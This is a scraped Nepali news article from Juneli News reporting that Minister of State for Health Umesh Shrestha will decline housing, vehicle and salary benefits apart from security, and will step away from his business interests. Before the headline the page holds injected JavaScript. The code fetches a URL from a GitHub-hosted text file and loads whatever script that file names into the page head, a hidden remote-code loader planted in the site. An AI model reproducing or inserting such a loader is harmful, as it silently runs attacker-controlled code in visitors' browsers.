;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); स्वास्थ्य तथा जनसंख्या राज्यमन्त्री उमेश श्रेष्ठले सुरक्षाकर्मी बाहेक अरु सरकारी सेवा नलिने घोषणा – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • स्वास्थ्य तथा जनसंख्या राज्यमन्त्री उमेश श्रेष्ठले सुरक्षाकर्मी बाहेक अरु सरकारी सेवा नलिने घोषणा
Breaking News

स्वास्थ्य तथा जनसंख्या राज्यमन्त्री उमेश श्रेष्ठले सुरक्षाकर्मी बाहेक अरु सरकारी सेवा नलिने घोषणा

जुनेली न्यूज, काठमाडौं । स्वास्थ्य तथा जनसंख्या राज्यमन्त्री उमेश श्रेष्ठले सोमबार आफ्नो १०० दिने कार्ययोजना सार्वजनिक गर्दै सरकारी सेवा सुविधा नलिने   घोषणा गरेका छन् ।राज्यमन्त्री श्रेष्ठले सुरक्षाकर्मी बाहेक आवास, गाडी र तलबभत्ता नलिने पनि  घोषणा गरेका हुन् ।

मन्त्री पदमा रहञ्जेल आफू संग्लग्न रहेको व्यावसायिक संस्थाबाट अलग हुने पनि श्रेष्ठले बताएका छन् ।

शिक्षा, स्वास्थ्य, हाइड्रो लगायतमा लगानी गरेका श्रेष्ठलाई प्रधानमन्त्री शेरबहादुर देउवाले १० साउनमा स्वास्थ्य राज्यमन्त्री नियुक्त गरेका थिए ।

फेसबुक प्रतिक्रियाहरु